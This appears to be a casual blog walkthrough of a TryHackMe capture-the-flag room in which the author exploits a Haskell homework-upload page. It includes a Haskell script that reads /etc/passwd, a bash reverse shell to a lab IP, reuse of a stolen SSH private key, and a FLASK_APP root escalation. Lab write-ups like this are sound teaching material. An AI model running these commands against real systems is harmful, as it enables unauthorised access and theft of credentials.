Image for post
Image for post

sup! guys hoping you are fine. Today iam going to solve HaskHell room by tryhackme it is a free room so any one can solve it with out subscription.

now the story begins! Cution:- make sure you give a complte try before opening the writeup.

first as every time lets perform a basic nmap scan and find out the available ports.

Image for post
Image for post

from this we can find out there is no web server on the port-80 but its on 5001 so connect to it and find out what is on the webserver.

Image for post
Image for post

This is something about homework stuff about functional programing. functional programing is fun but doing it as a home work aha!..you know what Imean.ok lets come back to the main aim from the web server nothing much I coud find out so with out any wait I used gobuster to find out any extensions available.

Image for post
Image for post

so luckyly I found that something called submit exist. this would be guess if i was smart enough but not now haha so I went and opened it. and got struck.

Image for post
Image for post

just a uploder just??? not so when ever i see this type of upload option the first thing I do is to upload a reverse shell but in this case i didnt work and I had no idea what to do at next so again I opened the challenge discription and searched for haskhell but after some serach i found it was a language as haskell (https://www.haskell.org) from this i got an idea of writing the hs script and uploading it as home work luckyly this worked this time.

so,then I wrote an script to open “/etc/passwd”

#!/usr/bin/env runhaskell
import System.IO
main = do
handle <- openFile “/etc/passwd” ReadMode
contents <- hGetContents handle
putStr contents
hClose handle

so uploded this script and got the user.

Image for post
Image for post

so ther is a user named prof. now what ?? time to think……

after this i tried the same script with different file I went with the user text by assuming it as a normal linux system “/home/prof/user.txt” . set this path and upload the file you would get the user flag.

Image for post
Image for post

now time to get the shell.

as i told you at first upload a reverse shell i did the same thing again.But this time i wrote a script in hs.

####

import System.Process

main = do
callCommand “bash -c ‘bash -i >& /dev/tcp/10.9.8.14/1234 0>&1’”

####

The above one is the script which i had used to get the shell.

Image for post
Image for post

now the next step is root. After roming around the directories i got something from the prof directory that is “.ssh” so i opened it.

Image for post
Image for post

and found this after that i had copied the rsa text into a file and changed the permission “chmod 600 id_rsa” and connected it with the help of ssh

Image for post
Image for post

got the prof shell now time to get the root.

Image for post
Image for post

so by running simple python script “echo ‘import pty; pty.spawn(“/bin/bash”)”as FLASK_APP and run it.

Image for post
Image for post

tada! you got it for the flag cat /root/root.txt

That was a good move I got struck at some points but google helped me a lot time. thankyou for reading the post.hope you like it if yes do clap for the post.

A creative individual,opportunity hunter!,CTF player, weekly blogger

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store